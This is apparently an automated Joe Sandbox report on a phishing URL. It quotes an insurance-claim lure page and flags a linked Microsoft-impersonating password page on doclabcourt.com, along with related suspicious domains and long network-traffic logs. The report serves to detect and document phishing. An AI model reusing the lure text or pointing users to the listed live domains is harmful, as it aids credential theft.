Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu

Overview

General Information

Sample URL:https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu
Analysis ID:1586966

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected landing page (webpage, office document or email)
Phishing site or detected (based on various text indicators)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1904,i,16735501633418542593,3350254754090490870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 5836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://you.doclabcourt.com/OhgiN/Joe Sandbox AI: Score: 9 Reasons: The URL 'you.doclabcourt.com' does not match the legitimate domain 'microsoft.com'., The domain 'doclabcourt.com' is not associated with Microsoft., The presence of 'you' as a subdomain and 'doclabcourt' as the main domain is suspicious and not related to Microsoft., Microsoft is a well-known brand, and any legitimate site would likely use a subdomain of 'microsoft.com'., The URL structure and domain name do not align with Microsoft's typical web properties. DOM: 2.5.pages.csv
Source: https://app.whirr.co/p/cm4711if90205nv0h2e4l0imuJoe Sandbox AI: Page contains button: 'CLICK HERE TO VIEW FULL DOCUMENT' Source: '0.1.pages.csv'
Source: Chrome DOM: 0.1OCR Text: IMPORTANT Claim Information Prepared date: January 9, 2025 Premium adjustments applied: Claim Record PDF Format Message Type: Claim Status: Received Successfully CLICK HERE TO VIEW FULL DOCUMENT Kindly click on the button above to access full documents Note: This Document will be available for 24hours. This link is intended for receiver of this email and will expire in 60 days. This communication, including attachments, is for the exclusive use of addressee and Made with Whirr may contain proprietary, confidential and/or privileged information. If you are not the
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Number of links: 0
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Total embedded image size: 123322
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Title: Sharing Link Validation does not match URL
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Invalid link: Privacy & Cookies
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: <input type="password" .../> found
Source: https://app.whirr.co/p/cm4711if90205nv0h2e4l0imuHTTP Parser: No favicon
Source: https://app.whirr.co/p/cm4711if90205nv0h2e4l0imuHTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No <meta name="author".. found
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.17:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49815 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 26MB later: 38MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: global trafficDNS traffic detected: DNS query: app.whirr.co
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: production-core.whirr.co
Source: global trafficDNS traffic detected: DNS query: you.doclabcourt.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: 7509147325-1323985617.cos.na-siliconvalley.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: 7509147325.lawyersfederalcourt.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.17:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49815 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.win@20/54@46/272
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1904,i,16735501633418542593,3350254754090490870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1904,i,16735501633418542593,3350254754090490870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
